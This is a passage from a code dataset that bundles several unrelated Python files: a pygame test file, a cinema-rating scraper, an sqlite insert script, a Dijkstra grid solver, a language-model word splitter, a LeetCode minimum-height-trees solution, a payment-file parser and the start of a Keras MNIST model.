测试:\n 接收绘制坐标(左上角)\n 返回颜色判断坐标(下边中心位置)\n :return:\n '''\n screen, person =createTestEnvironment()\n if person.color_judge_point([100,100]) == [132, 193]:\n print(\"test_color_judge_point: OK!\")\n else:\n print(\"test_color_judge_point: Error!\")\n print(\"Error result: \", person.color_judge_point([100,100]))\n\n#----------------------------------------------碰撞检测测试的分割线-------------------------------------------------------\n\n\ndef test_impactRange():\n '''\n 测试:计算碰撞的范围\n :return:\n '''\n screen, person =createTestEnvironment()\n xList, yList = person.impactRange()\n print(type(person.vector))\n if xList == range(0, 64+1) and yList == range(0, 104 + 1):\n print(\"test_impactRange: OK!\")\n else:\n print(\"test_impactRange: Error!\")\n print(\"xList: %s \\n yList: %s\" % (xList, yList))\n\ndef test_moveJudge():\n '''\n 测试:检测人物是否处在遮挡层黑色部分\n :return:\n '''\n screen, person =createTestEnvironment()\n #print(type(person.vector))\n image = 'image\\\\background1.jpg'\n backGround = BackGround(image)\n #此处应为白色,返回True\n person.vector = Vector2(300,300)\n if person.moveJudge(backGround, screen):\n print(\"test_moveJudge: OK!\")\n else:\n print(\"test_moveJudge: Error!\")\n print(\"color: \", (backGround.getColor(screen, (50,0))))\n\n#----------------------------------------------启动测试的分割线-------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n '''存储图片测试'''\n #test_image_filename_judge()\n #test_image_dictionary()\n '''移动测试'''\n test_render()\n #test_personMove() #这个测试还没写好....\n #est_color_judge_point()\n #test_person_move_distance_image()\n #test_person_move_direction()\n #test_person_move_image()\n #test_move_image_action()\n '''碰撞检测测试'''\n\n","sub_path":"person_class/test_person_class.py","file_name":"test_person_class.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"178019359","text":"import json\nimport logging\nimport sys\n\nimport requests\nfrom lxml import html\n\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n\ndef fetch_afisha_page():\n url = 'https://www.afisha.ru/msk/schedule_cinema/'\n return requests.get(url).text\n\n\ndef parse_afisha_list(raw_html):\n tree = html.fromstring(raw_html)\n movie_titles = tree.xpath('//*[@id=\"schedule\"]/div/div[2]/h3/a/text()')\n movie_links = tree.xpath('//*[@id=\"schedule\"]/div/div[2]/h3/a/@href')\n theater_tables = tree.xpath('//*[@id=\"schedule\"]/div/table/tbody')\n theater_counts = [len(table.getchildren()) for table in theater_tables]\n raw_movies = list(zip(movie_titles, movie_links, theater_counts))\n movie_properties = ('title', 'url', 'theatre_count')\n return [dict(zip(movie_properties, raw_movie)) for raw_movie in raw_movies]\n\n\ndef fetch_movie_info_from_kinopoisk(movie_title):\n # kinopoisk search suggestion system usually gives us the result we want\n # and it probably won't ban us because of frequent requests\n logging.debug('Fetching %s', movie_title)\n url = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk'\n headers = {\n 'Host': 'suggest-kinopoisk.yandex.net',\n 'Origin': 'https://plus.kinopoisk.ru',\n 'Accept-Language': 'en-us',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Accept': '*/*',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30',\n 'Referer': 'https://plus.kinopoisk.ru/',\n 'DNT': '1',\n }\n params = {\n 'srv': 'kinopoisk',\n 'part': movie_title,\n '_': '1504208262833',\n }\n response = requests.get(\n url,\n headers=headers,\n params=params\n )\n raw_json_response = response.json()\n logging.debug('raw json response: %s', raw_json_response)\n if raw_json_response[2]:\n return json.loads(raw_json_response[2][0])\n else:\n raise RuntimeWarning(\n \"Couldn't get kinopoisk info for '{}'\".format(movie_title)\n )\n\n\ndef fetch_movie_rating_info(movie_title):\n try:\n kinopoisk_info = fetch_movie_info_from_kinopoisk(movie_title)\n except RuntimeWarning as e:\n logging.warning(e)\n else:\n kinopoisk_rating = kinopoisk_info.get('rating')\n if kinopoisk_rating and kinopoisk_rating['ready']:\n rating_info = {}\n rating_info['rating'] = kinopoisk_rating['rate']\n rating_info['votes'] = kinopoisk_rating['votes']\n return rating_info\n else:\n logging.info(\n 'Rating for %s is not available yet',\n movie['title']\n )\n\n\ndef output_rated_movie_to_stdout(movie):\n print(\n '{} - Рейтинг {} ({}) - Количество кинотеатров: {} - {}'.format(\n movie['title'],\n movie['rating'],\n movie['votes'],\n movie['theatre_count'],\n movie['url'],\n )\n )\n\n\nif __name__ == '__main__':\n raw_afisha_html = fetch_afisha_page()\n movies = parse_afisha_list(raw_afisha_html)\n rated_movies = []\n for movie in movies:\n rating_info = fetch_movie_rating_info(movie['title'])\n if rating_info:\n movie['rating'] = rating_info['rating']\n movie['votes'] = rating_info['votes']\n rated_movies.append(movie)\n rated_movies.sort(\n key=lambda movie: movie['rating'],\n reverse=True\n )\n movies_to_output = 10\n for movie in rated_movies[:movies_to_output]:\n output_rated_movie_to_stdout(movie)\n","sub_path":"cinemas.py","file_name":"cinemas.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"545094047","text":"\nimport sqlite3\nimport random\n\nnumbers = {}\n\nwith sqlite3.connect(\"newnum.db\") as connection:\n\n c = connection.cursor()\n\n c.execute(\"DROP TABLE IF exists integers\")\n c.execute(\"CREATE TABLE IF not exists integers(ind INT, value INT)\")\n\n for i in range(0,100):\n j = random.randint(0,100)\n numbers[i] = j\n\n for entry in numbers:\n c.execute(\"INSERT INTO integers VALUES(?, ?)\", (entry, numbers[entry]))\n connection.commit()\n # print entry, numbers[entry]\n","sub_path":"sql-homework-11_insert.py","file_name":"sql-homework-11_insert.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"505687619","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom grid import *\nimport queue\nfrom grid_waypoint import GridWayPoint\n\ndebug_file = open(\"images/dijkstra/dijkstra_debug.txt\", \"w+\")\n\ndef dijkstra_solve(grid, \n allowDiagonalMoves = False,\n avoidObstacles = False,\n weightXDistance = 1,\n weightYDistance = 1):\n \n parents = {}\n costs = {}\n frontier = queue.PriorityQueue()\n\n start_wp = grid.start_waypoint\n # Add the start waypoint to the queue and mark it as visited\n frontier.put((0, start_wp))\n parents[start_wp] = None\n grid[start_wp.x, start_wp.y] |= GridFlags.VISITED\n costs[start_wp] = 0\n\n wp = None\n while not frontier.empty():\n wp = frontier.get()[1]\n # Flag the cell as the current cell. This is only needed for \n # coloring/visualization\n grid[wp.x, wp.y] |= GridFlags.CURRENT\n debug_file.write(\"----------------------------------------------------\\n\")\n debug_file.write(\"Current Waypoint is: \" + str(wp) + \"\\n\")\n debug_file.write(\"Number of waypoints in queue: \" + str(frontier.qsize()) + \"\\n\")\n \n if (wp.x == grid.goal_waypoint.x and wp.y == grid.goal_waypoint.y):\n debug_file.write(\"Found goal, exiting loop\")\n break\n neighbors = grid.find_neighbors(wp, allowDiagonalMoves)\n for neighbor in neighbors:\n # Need to accumulate the cost, so take the cost to get from the start\n # to the current waypoint, and the cost of moving from the current\n # waypoint to the neighbor\n new_cost = costs[wp] + weightXDistance * abs(wp.x - neighbor.x) + weightYDistance * abs(wp.y - neighbor.y)\n if avoidObstacles:\n if grid.is_near_obstacle(neighbor, allowDiagonalMoves):\n new_cost += 10000\n\n debug_file.write(\"~~~~~~~~~~~\" + \"\\n\")\n debug_file.write(\"Neighbor: \" + str(neighbor) + \"\\n\")\n debug_file.write(\"Cost calculated is: \" + str(new_cost) + \"\\n\")\n # We have a cost for this neighbor, but we need to do two checks:\n # 1. Is this a new neighbor? never been visited before?\n # 2. If it has been visited before, is the new cost lower\n # then the previous calculated cost. This would indicate we have found\n # a \"better\" path to this neighbor\n #\n # First check, this cell is never been visited, and the \n # second check is checking that the new cost is lest the previously\n # calculated cost\n if neighbor not in costs or new_cost < costs[neighbor]:\n # Check only for debugging, if cost is lower write it to file\n if neighbor in costs and new_cost < costs[neighbor]:\n debug_file.write(\"Lower cost determined, previous cost was: \" + str(costs[neighbor]) + \"\\n\")\n costs[neighbor] = new_cost\n # Update the parent cell as well\n parents[neighbor] = wp\n frontier.put((new_cost, neighbor))\n # Mark the cell as visited, this is just for visualization\n grid[neighbor.x, neighbor.y] |= GridFlags.VISITED\n\n # Turn off the current flag, only needed for visualization\n grid[wp.x, wp.y] &= ~GridFlags.CURRENT\n\n parent = parents[wp]\n number_of_steps = 1\n total_cost = costs[wp]\n while parent is not None:\n grid[parent.x, parent.y] |= GridFlags.PATH\n parent = parents[parent]\n number_of_steps += 1\n total_cost += costs[wp]\n print(\"Total number of steps: \" + str(number_of_steps))\n print(\"Total cost: \" + str(total_cost))\n return number_of_steps\n\nif __name__ == \"__main__\":\n\n\n grid = Grid(gridFile = \"fixed_grid/new_fixed_grid.txt\")\n # Default behavior\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves\",\n titleFigure = \"4 Moves Equal weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting X direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=100, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_xweighted\",\n titleFigure = \"4 Moves 100 X weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting Y direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=100,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_yweighted\",\n titleFigure = \"4 Moves 100 Y weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Avoid Obstacles\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=True)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_avoid_obstacles\",\n titleFigure = \"4 Moves Equal weighting avoid obstalces\\n\" + str(num_steps) + \" Number of steps\")\n\n \"\"\" -------------------------------------\n Allowing Diagonal moves\n -------------------------------------\n \"\"\"\n\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n # Default behavior\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves\",\n titleFigure = \"8 Moves Equal weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting X direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=100, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_xweighted\",\n titleFigure = \"8 Moves 100 X weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting Y direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=100,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_yweighted\",\n titleFigure = \"8 Moves 100 Y weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Avoid Obstacles\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=True)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_avoid_obstacles\",\n titleFigure = \"8 Moves Equal weighting avoid obstalces\\n\" + str(num_steps) + \" Number of steps\")","sub_path":"week1/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"447395855","text":"#!/usr/bin/env python\n\"\"\"\nDefines Splitter class for splitting strings of contiguous non-whitespace\ncharacters into strings of space-separated words. Requires language model in\nARPA format specifying lowercase unigrams and bigrams and a text to train\ncharacter probabilities. Uses Katz backoff smoothing for unseen bigrams, but strings\ncontaining unseen unigrams are returned unsplit. Splitting is case insensitive.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom sys import argv\nfrom string import split,strip\nfrom collections import deque\nfrom math import log10\n\n\n\nclass Splitter(object):\n\n def __init__(self, lmFile, charTextFile, lmWeight=1.0):\n\n # read token likelihoods from language model\n self._unigrams = {}\n self._bigrams = {}\n self._numUnigrams = 0\n self._numBigrams = 0\n self._bows = {}\n with open(lmFile, \"r\") as f:\n while True:\n line = strip(f.readline())\n if line:\n if line == \"\\\\end\\\\\":\n break\n\n if line == \"\\\\1-grams:\":\n while True:\n line = strip(f.readline())\n if not line:\n break\n parts = split(line)\n self._unigrams[parts[1]] = float(parts[0]) * lmWeight\n self._numUnigrams += 1\n if len(parts) > 2:\n self._bows[parts[1]] = float(parts[2])\n\n elif line == \"\\\\2-grams:\":\n while True:\n line = strip(f.readline())\n if not line:\n break\n parts = split(line)\n if not parts[1] in self._bigrams:\n self._bigrams[parts[1]] = {}\n self._bigrams[parts[1]][parts[2]] = float(parts[0]) * lmWeight\n self._numBigrams += 1\n\n if self._bigrams and self._unigrams:\n break\n\n # read character likelihoods from char text file\n charCounts = {}\n charBigramCounts = {}\n charBigramTotals = {}\n totalChars = 0\n lastCh = None\n with open(charTextFile, \"r\") as f:\n for line in f:\n for ch in strip(line).lower():\n if not ch in charCounts:\n charCounts[ch] = 0\n if not lastCh is None:\n if not lastCh in charBigramCounts:\n charBigramCounts[lastCh] = {}\n charBigramTotals[lastCh] = 0\n if not ch in charBigramCounts[lastCh]:\n charBigramCounts[lastCh][ch] = 0\n charBigramCounts[lastCh][ch] += 1\n charBigramTotals[lastCh] += 1\n charCounts[ch] += 1\n totalChars += 1\n lastCh = ch\n\n # add one smoothing for unseen character bigrams\n for ch in charCounts:\n for nextCh in charCounts:\n if not nextCh in charBigramCounts[ch]:\n charBigramCounts[ch][nextCh] = 1\n charBigramTotals[ch] += 1\n\n self._charUnigrams = {}\n self._charBigrams = {}\n for ch in charCounts:\n self._charBigrams[ch] = {}\n for nextCh in charBigramCounts[ch]:\n p = float(charBigramCounts[ch][nextCh]) / charBigramTotals[ch]\n self._charBigrams[ch][nextCh] = log10(p)\n self._charUnigrams[ch] = log10(float(charCounts[ch]) / totalChars)\n\n assert(\" \" in self._charUnigrams)\n\n\n\n def split(self, toSplit):\n\n if len(toSplit) < 2:\n return toSplit\n\n lowered = toSplit.lower()\n\n # find potential tokens and cache indices of tokens starting at each character\n tokens = {}\n chPrefixCache = {}\n j = 0\n for ch in set(lowered):\n for tok in self._unigrams:\n if tok.startswith(ch) and len(tok) <= len(lowered):\n tokens[j] = tok\n if not ch in chPrefixCache:\n chPrefixCache[ch] = set()\n chPrefixCache[ch].add(j)\n j += 1\n\n if not tokens:\n return toSplit\n\n\n # find most likely token sequence\n m = [ [float(\"-infinity\")] * len(lowered) for tok in tokens]\n back = [ [None] * len(lowered) for tok in tokens]\n startedToks = [ set() for ch in range(len(lowered))]\n beam = set()\n\n # initialization\n if not lowered[0] in chPrefixCache or not lowered[0] in self._charUnigrams:\n return toSplit\n\n for j in chPrefixCache[lowered[0]]:\n tok = tokens[j]\n if len(tok) == 1:\n startedToks[0].add(j)\n beam.add(j)\n elif tok[1] == lowered[1] and len(tok) <= len(lowered):\n startedToks[0].add(j)\n beam.add(j)\n\n for j in startedToks[0]:\n tok = tokens[j]\n if len(tok) == 1 and tok in self._charUnigrams:\n try:\n m[j][0] = (self._unigrams[tok] + self._charUnigrams[tok]\n + self._charBigrams[tok][\" \"] + self._charUnigrams[\" \"])\n back[j][0] = j\n except KeyError:\n m[j][0] = float(\"-infinity\")\n \n\n\n # recursion\n for i in range(1, len(lowered)):\n ch = lowered[i]\n\n # inspect new tokens starting at current character\n if ch in chPrefixCache:\n for j in chPrefixCache[ch]:\n tok = tokens[j]\n if len(tok) == 1:\n startedToks[i].add(j)\n elif i < len(lowered) - 1 and i + len(tok) <= len(lowered):\n if tok[1] == lowered[i+1]:\n startedToks[i].add(j)\n\n nextBeam = set(beam)\n\n # find best ended token and prune impossible continuing tokens\n for n in range(i+1):\n pruned = set()\n for j in startedToks[i-n]:\n tok = tokens[j]\n if len(tok) > n:\n if tok[n] != ch: # current char doesn't match continuation of token\n pruned.add(j)\n\n elif n == len(tok) - 1: # current char ends a token\n nextBeam.add(j)\n try:\n lastCh = tok[0]\n tokenCharLike = self._charUnigrams[lastCh]\n if len(tok) > 1:\n for ch in tok[1:]:\n try:\n tokenCharLike += self._charBigrams[lastCh][ch] + self._charUnigrams[ch]\n except KeyError:\n tokenCharLike += float(\"-infinity\")\n lastCh = ch\n tokenCharLike += self._charBigrams[lastCh][\" \"] + self._charUnigrams[\" \"]\n except KeyError:\n tokenCharLike = float(\"-infinity\")\n\n\n # set back pointers\n for k in beam:\n lastTok = tokens[k]\n lastLike = 0.0\n if i-len(tok) >= 0:\n lastLike = m[k][i-len(tok)]\n\n try:\n like = lastLike + tokenCharLike + self._bigrams[lastTok][tok]\n except KeyError:\n like = lastLike + tokenCharLike + self._unigrams[tok]\n if lastTok in self._bows:\n like += self._bows[lastTok]\n \n \n if like > m[j][i]:\n m[j][i] = like\n back[j][i] = k\n\n startedToks[i-n] -= pruned\n\n beam = nextBeam\n\n\n # backtrace\n bestJ = None\n bestLike = float(\"-infinity\")\n for j in range(len(tokens)):\n if m[j][len(lowered)-1] > bestLike:\n bestLike = m[j][len(lowered)-1]\n bestJ = j\n\n if bestJ is None:\n return toSplit\n\n path = deque()\n i = len(lowered)-1\n j = bestJ\n while i >= 0:\n tok = tokens[j]\n path.appendleft(tok)\n j = back[j][i]\n i -= len(tok)\n \n\n # split and return original string\n final = []\n i = 0\n for tok in path:\n final.append(toSplit[i:i+len(tok)])\n i += len(tok)\n\n return \" \".join(final)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n if len(argv) != 3:\n print(\"Usage: %s arpa_lm_in char_text_in\" % argv[0])\n quit(1)\n\n s = Splitter(argv[1], argv[2])\n print(\"Read %d unigrams and %d bigrams. Type strings to split:\" % (s._numUnigrams, s._numBigrams))\n\n while True:\n line = raw_input(\"> \")\n if not strip(line):\n break\n print( s.split(line))\n print()\n","sub_path":"string-spacer/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"329838913","text":"\"\"\"\n310. Minimum Height Trees\n\n\nA tree is an undirected graph in which any two vertices are connected by exactly one path. In other words, any connected graph without simple cycles is a tree.\n\nGiven a tree of n nodes labelled from 0 to n - 1, and an array of n - 1 edges where edges[i] = [ai, bi] indicates that there is an undirected edge between the two nodes ai and bi in the tree,\nyou can choose any node of the tree as the root. When you select a node x as the root, the result tree has height h.\nAmong all possible rooted trees, those with minimum height (i.e. min(h)) are called minimum height trees (MHTs).\n\nReturn a list of all MHTs' root labels. You can return the answer in any order.\n\nThe height of a rooted tree is the number of edges on the longest downward path between the root and a leaf.\n\n\n\nExample 1:\n\n\nInput: n = 4, edges = [[1,0],[1,2],[1,3]]\nOutput: [1]\nExplanation: As shown, the height of the tree is 1 when the root is the node with label 1 which is the only MHT.\nExample 2:\n\n\nInput: n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]\nOutput: [3,4]\nExample 3:\n\nInput: n = 1, edges = []\nOutput: [0]\nExample 4:\n\nInput: n = 2, edges = [[0,1]]\nOutput: [0,1]\n\n\nConstraints:\n\n1 <= n <= 2 * 104\nedges.length == n - 1\n0 <= ai, bi < n\nai != bi\nAll the pairs (ai, bi) are distinct.\nThe given input is guaranteed to be a tree and there will be no repeated edges.\n\n\n\nSolution\nOverview\nAs the hints suggest, this problem is related to the graph data structure. Moreover, it is closely related to the problems of Course Schedule and Course Schedule II.\nThis relationship is not evident, yet it is the key to solve the problem, as one will see later.\n\nFirst of all, as a straight-forward way to solve the problem, we can simply follow the requirements of the problem, as follows:\n\nStarting from each node in the graph, we treat it as a root to build a tree. Furthermore, we would like to know the distance between this root node and the rest of the nodes.\nThe maximum of the distance would be the height of this tree.\n\nThen according to the definition of Minimum Height Tree (MHT), we simply filter out the roots that have the minimal height among all the trees.\n\nThe first step we describe above is actually the problem of Maximum Depth of N-ary Tree, which is to find the maximum distance from the root to the leaf nodes.\nFor this, we can either apply the Depth-First Search (DFS) or Breadth-First Search (BFS) algorithms.\n\nWithout a rigid proof, we can see that the above straight-forward solution is correct, and it would work for most of the test cases.\n\nHowever, this solution is not efficient, whose time complexity would be (N^2) where NN is the number of nodes in the tree.\nAs one can imagine, it will result in Time Limit Exceeded exception in the online judge.\n\nAs a spoiler alert, in this article, we will present a topological sorting alike algorithm with time complexity of O(N), which is also the algorithm to solve the well-known course schedule problems.\n\n\n\"\"\"\nclass MinimumHeightTrees:\n\n class Graph:\n\n def __init__(self, n, edges):\n\n self.V = n\n self.degree = [0 for _ in range(self.V)]\n self.edges = [[] for _ in range(self.V)]\n for c in edges:\n self.degree[c[0]] += 1\n self.degree[c[1]] += 1\n\n self.edges[c[0]].append(c[1])\n self.edges[c[1]].append(c[0])\n\n def minHighTree(self):\n\n if self.V == 1:\n return [0]\n\n level = []\n for i in range(len(self.degree)):\n if self.degree[i] == 1:\n level.append(i)\n\n nums = self.V\n while nums > 2:\n nums -= len(level)\n tmp = []\n\n for i in level:\n for c in self.edges[i]:\n self.degree[c] -= 1\n if self.degree[c] == 1:\n tmp.append(c)\n level = tmp\n\n return level\n\n def findMinHeightTrees(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n g = MinimumHeightTrees.Graph(n, edges)\n return g.minHighTree()\n\n \"\"\"\n \n Approach 1: Topological Sorting\n Intuition\n \n First of all, let us clarify some concepts.\n \n The distance between two nodes is the number of edges that connect the two nodes.\n \n Note, normally there could be multiple paths to connect nodes in a graph. In our case though, since the input graph can form a tree from any node, as specified in the problem, there could only be one path between any two nodes. In addition, there would be no cycle in the graph. As a result, there would be no ambiguity in the above definition of distance.\n \n The height of a tree can be defined as the maximum distance between the root and all its leaf nodes.\n \n With the above definitions, we can rephrase the problem as finding out the nodes that are overall close to all other nodes, especially the leaf nodes.\n \n If we view the graph as an area of circle, and the leaf nodes as the peripheral of the circle, then what we are looking for are actually the centroids of the circle, i.e. nodes that is close to all the peripheral nodes (leaf nodes).\n \n example of graph\n \n For instance, in the above graph, it is clear that the node with the value 1 is the centroid of the graph. If we pick the node 1 as the root to form a tree, we would obtain a tree with the minimum height, compared to other trees that are formed with any other nodes.\n \n Before we proceed, here we make one assertion which is essential to the algorithm.\n \n For the tree-alike graph, the number of centroids is no more than 2.\n \n If the nodes form a chain, it is intuitive to see that the above statement holds, which can be broken into the following two cases:\n \n If the number of nodes is even, then there would be two centroids.\n If the number of nodes is odd, then there would be only one centroid.\n example of centroids\n \n For the rest of cases, we could prove by contradiction. Suppose that we have 3 centroids in the graph, if we remove all the non-centroid nodes in the graph, then the 3 centroids nodes must form a triangle shape, as follows:\n \n triangle\n \n Because these centroids are equally important to each other, and they should equally close to each other as well. If any of the edges that is missing from the triangle, then the 3 centroids would be reduced down to a single centroid.\n \n However, the triangle shape forms a cycle which is contradicted to the condition that there is no cycle in our tree-alike graph. Similarly, for any of the cases that have more than 2 centroids, they must form a cycle among the centroids, which is contradicted to our condition.\n \n Therefore, there cannot be more than 2 centroids in a tree-alike graph.\n \n Algorithm\n \n Given the above intuition, the problem is now reduced down to looking for all the centroid nodes in a tree-alike graph, which in addition are no more than two.\n \n The idea is that we trim out the leaf nodes layer by layer, until we reach the core of the graph, which are the centroids nodes.\n \n trim\n \n Once we trim out the first layer of the leaf nodes (nodes that have only one connection), some of the non-leaf nodes would become leaf nodes.\n \n The trimming process continues until there are only two nodes left in the graph, which are the centroids that we are looking for.\n \n The above algorithm resembles the topological sorting algorithm which generates the order of objects based on their dependencies. For instance, in the scenario of course scheduling, the courses that have the least dependency would appear first in the order.\n \n In our case, we trim out the leaf nodes first, which are the farther away from the centroids. At each step, the nodes we trim out are closer to the centroids than the nodes in the previous step. At the end, the trimming process terminates at the centroids nodes.\n \n Implementation\n \n Given the above algorithm, we could implement it via the Breadth First Search (BFS) strategy, to trim the leaf nodes layer by layer (i.e. level by level).\n \n Initially, we would build a graph with the adjacency list from the input.\n \n We then create a queue which would be used to hold the leaf nodes.\n \n At the beginning, we put all the current leaf nodes into the queue.\n \n We then run a loop until there is only two nodes left in the graph.\n \n At each iteration, we remove the current leaf nodes from the queue. While removing the nodes, we also remove the edges that are linked to the nodes. As a consequence, some of the non-leaf nodes would become leaf nodes. And these are the nodes that would be trimmed out in the next iteration.\n \n The iteration terminates when there are no more than two nodes left in the graph, which are the desired centroids nodes.\n \n Here are some sample implementations that are inspired from the post of dietpepsi in the discussion forum.\n \n \"\"\"\n def doit_topsort(self, n: int, edges: list) -> list:\n\n # base cases\n if n <= 2:\n return [i for i in range(n)]\n\n # Build the graph with the adjacency list\n neighbors = [set() for i in range(n)]\n for start, end in edges:\n neighbors[start].add(end)\n neighbors[end].add(start)\n\n # Initialize the first layer of leaves\n leaves = []\n for i in range(n):\n if len(neighbors[i]) == 1:\n leaves.append(i)\n\n # Trim the leaves until reaching the centroids\n remaining_nodes = n\n while remaining_nodes > 2:\n remaining_nodes -= len(leaves)\n new_leaves = []\n # remove the current leaves along with the edges\n while leaves:\n leaf = leaves.pop()\n # the only neighbor left for the leaf node\n neighbor = neighbors[leaf].pop()\n # remove the only edge left\n neighbors[neighbor].remove(leaf)\n if len(neighbors[neighbor]) == 1:\n new_leaves.append(neighbor)\n\n # prepare for the next round\n leaves = new_leaves\n\n # The remaining nodes are the centroids of the graph\n return leaves\n","sub_path":"PythonLeetcode/leetcodeM/310_MinimumHeightTrees.py","file_name":"310_MinimumHeightTrees.py","file_ext":"py","file_size_in_byte":10779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"33582635","text":"class Devolvidos:\n\n def abrir(self, path):\n with open(path, encoding='latin-1') as entrada:\n dados = entrada.read().splitlines()\n return dados\n\n def montar_mapa(self, lista):\n mapa = {}\n codigo = lista[0][1:4]\n nome = lista[0][4:43]\n for item in lista[1:-1]:\n status = item[457:458]\n if status == '3' or status == '4':\n data = item[477:485]\n protocolo = item[447:457]\n if not codigo in mapa:\n mapa[codigo] = {}\n mapa[codigo][nome] = {}\n if not data in mapa[codigo][nome]:\n mapa[codigo][nome][data] = [1, int(item[471:476]),[f'{protocolo};{item[471:476]}']]\n else:\n valor = int(item[471:476])\n mapa[codigo][nome][data][0] += 1\n mapa[codigo][nome][data][1] += valor\n mapa[codigo][nome][data][2].append(f'{protocolo};{valor}')\n return mapa\n\n def processar_lista(self, path, lista_base):\n for item in lista_base:\n codigo = item.split(' ')[0]\n meio = item.split(' ')[-1]\n if meio == 'TED':\n if 'R' + codigo in path:\n arquivo = self.abrir(path)\n mapa = self.montar_mapa(arquivo)\n return mapa\n\n def gravar(self, linha):\n with open('lista_devolvidos.txt', 'a') as saida:\n saida.write(linha + '\\n')\n","sub_path":"calcula custa devolvidos/classes/devolvidos.py","file_name":"devolvidos.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"168587041","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nnp.random.seed(1212)\r\n\r\nimport keras\r\nfrom keras.models import Model\r\nfrom keras.layers import *\r\nfrom keras import optimizers\r\nfrom sklearn.model_selection import train_test_split\r\n# file open\r\ndf_train = pd.read_csv('C:/Users/user/Desktop/kaggle/mnist/train.csv')\r\ndf_test = pd.read_csv('C:/Users/user/Desktop/kaggle/mnist/test.csv')\r\n\r\nprint(\"Open Success\\n\")\r\n\r\n# reshape dataset to array\r\ndf_features = df_train.iloc[:, 1:785]\r\ndf_label = df_train.iloc[:, 0]\r\n\r\nX_test = df_test.iloc[:, 0:784]\r\n\r\nX_train, X_cv, y_train, y_cv = train_test_split(df_features, df_label, test_size = 0.2, random_state = 1212)\r\nX_train = X_train.as_matrix().reshape(33600, 784) #(33600, 784)\r\nX_cv = X_cv.as_matrix().reshape(8400, 784) #(8400, 784)\r\n\r\nX_test = X_test.as_matrix().reshape(28000, 784)\r\n\r\n# nomarlize\r\nX_train = X_train.astype('float32'); \r\nX_cv= X_cv.astype('float32'); \r\nX_test = X_test.astype('float32')\r\nX_train /= 255; X_cv /= 255; X_test /= 255\r\n\r\n# One Hot Encoded\r\nnum_digits = 10\r\ny_train = keras.utils.to_categorical(y_train, num_digits)\r\ny_cv = keras.utils.to_categorical(y_cv, num_digits) \r\n\r\n# make model\r\nn_input = 784 # number of features\r\nn_hidden_1 = 300\r\nn_hidden_2 = 100\r\nn_hidden_3 = 100\r\nn_hidden_4 = 200\r\nn_hidden_5 = 100\r\nnum_digits = 10\r\n\r\nInp = Input(shape=(784,))\r\nx = Dense(n_hidden_1, activation='relu', name = \"Hidden_Layer_1\", bias_initializer='he_normal')(Inp)\r\nx = 